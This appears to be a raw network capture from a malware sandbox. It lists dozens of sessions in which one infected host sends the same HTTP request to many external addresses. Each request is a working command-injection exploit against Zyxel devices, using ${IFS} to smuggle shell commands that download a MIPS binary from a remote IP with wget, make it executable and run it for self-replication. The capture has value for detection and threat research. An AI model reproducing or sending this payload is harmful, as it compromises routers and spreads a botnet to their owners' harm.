                                                Jan 28, 2024 10:16:19.727291107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2964192.168.2.235557496.102.230.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727318048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2965192.168.2.2337862166.120.93.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727329016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2966192.168.2.2360014116.95.157.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727344036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2967192.168.2.2337888123.24.219.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727370977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2968192.168.2.2346516180.85.15.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727415085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2969192.168.2.2358532106.13.16.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727435112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2970192.168.2.2348880140.95.99.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727466106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2971192.168.2.233666652.140.84.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727485895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2972192.168.2.2357644157.162.63.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727516890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2973192.168.2.233304687.215.138.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727555037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2974192.168.2.2333604111.138.135.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727572918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2975192.168.2.235544485.227.71.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727607965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2976192.168.2.235543450.124.143.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727662086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2977192.168.2.2333922111.64.151.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727715969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2978192.168.2.235178665.38.121.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727731943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2979192.168.2.2351938125.13.186.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727766991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2980192.168.2.2357752172.78.109.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727777958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2981192.168.2.2345074135.87.150.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727780104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2982192.168.2.2355438124.117.101.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727828979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2983192.168.2.235351862.178.170.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727878094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2984192.168.2.235585219.118.53.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727884054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2985192.168.2.236040457.170.245.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727893114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2986192.168.2.2334284129.150.78.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727927923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2987192.168.2.2357526108.157.76.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727957964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2988192.168.2.234669847.46.67.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727991104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2989192.168.2.235290299.92.97.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728044033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2990192.168.2.2335824125.150.82.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728065014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2991192.168.2.2349156133.232.166.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728080034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2992192.168.2.235098688.213.22.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728113890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2993192.168.2.2342422194.130.246.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728148937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2994192.168.2.2345890109.238.16.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728162050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2995192.168.2.2348088153.29.163.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728187084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2996192.168.2.2338898221.245.162.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728212118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2997192.168.2.233827267.64.176.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728230953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2998192.168.2.235730257.3.21.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728260040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2999192.168.2.2352306110.124.173.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728290081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3000192.168.2.2344372209.103.127.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728318930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3001192.168.2.2335650190.119.86.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728348970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3002192.168.2.2354442108.208.137.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728383064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3003192.168.2.2333108206.238.5.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728404999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3004192.168.2.2344982192.162.12.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728431940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3005192.168.2.233335044.32.68.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728472948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3006192.168.2.2344760113.252.32.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728498936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3007192.168.2.233369827.176.173.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728507996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3008192.168.2.233516860.7.233.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728538036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3009192.168.2.233641427.79.52.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728563070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3010192.168.2.2356478148.251.165.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728590965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3011192.168.2.233383896.170.197.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728616953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3012192.168.2.2338840139.243.228.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728646040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3013192.168.2.2346626104.6.36.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728652000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3014192.168.2.2341410136.97.183.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728698969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3015192.168.2.235862083.168.26.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728719950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3016192.168.2.233320883.140.252.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728743076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3017192.168.2.234768860.29.158.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728760004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3018192.168.2.2345292128.196.76.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728810072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3019192.168.2.234829488.174.101.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728816032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3020192.168.2.2346340207.255.203.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728827000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3021192.168.2.2348744104.51.226.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728847980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3022192.168.2.2356438149.89.95.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728884935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3023192.168.2.2344832120.147.31.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728919983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3024192.168.2.2337496170.181.44.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728954077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3025192.168.2.234318244.104.197.54443
                                                TimestampBytes transferredDirectionData
